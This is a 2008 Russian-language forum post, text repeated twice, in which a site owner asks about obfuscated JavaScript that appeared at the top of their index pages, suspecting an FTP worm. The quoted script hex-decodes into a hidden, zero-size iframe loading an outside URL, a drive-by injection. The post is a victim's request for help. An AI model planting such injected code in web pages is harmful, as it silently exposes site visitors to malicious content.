comeoff
15.03.2008, 18:24
Интересную сказку начал наблюдать в исходниках на своих сайтах (все на одном хосте висят)
В индексах в самом верху начал наблюдаться какой то ява скрипт. Подозрения на фтп червя, но я не уверен. может кто подскажет, что это за скриптег такой и что он делает?
<script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi<skusjits.length;uknzaxauyi+=2){fgdxbotv+=(String.f romCharCode(parseInt(skusjits.substr(uknzaxauyi,2) ,16)));}document.write(fgdxbotv);}ahpgxusvlwuzz("3C696672616D65207372633D22687474703A2F2F746F703130 302D636F756E7465722E636F6D2F746F703130302F696E6465 782E70687022206672616D65626F726465723D22302220626F 726465723D2230222077696474683D22302220686569676874 3D223022207374796C653D22706F736974696F6E3A20616273 6F6C7574653B207669736962696C6974793A2068696464656E 3B20646973706C61793A206E6F6E65223E3C2F696672616D65 3E");</script>
П.С. возможно я создал тему не в той ветке, но на мой взгляд она должна быть тут, так что прошу, если что, судить не строго и больно не пинать))
В индексах в самом верху начал наблюдаться какой то ява скрипт. Подозрения на фтп червя, но я не уверен. может кто подскажет, что это за скриптег такой и что он делает?
<script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi<skusjits.length;uknzaxauyi+=2){fgdxbotv+=(String.f romCharCode(parseInt(skusjits.substr(uknzaxauyi,2) ,16)));}document.write(fgdxbotv);}ahpgxusvlwuzz("3C696672616D65207372633D22687474703A2F2F746F703130 302D636F756E7465722E636F6D2F746F703130302F696E6465 782E70687022206672616D65626F726465723D22302220626F 726465723D2230222077696474683D22302220686569676874 3D223022207374796C653D22706F736974696F6E3A20616273 6F6C7574653B207669736962696C6974793A2068696464656E 3B20646973706C61793A206E6F6E65223E3C2F696672616D65 3E");</script>
П.С. возможно я создал тему не в той ветке, но на мой взгляд она должна быть тут, так что прошу, если что, судить не строго и больно не пинать))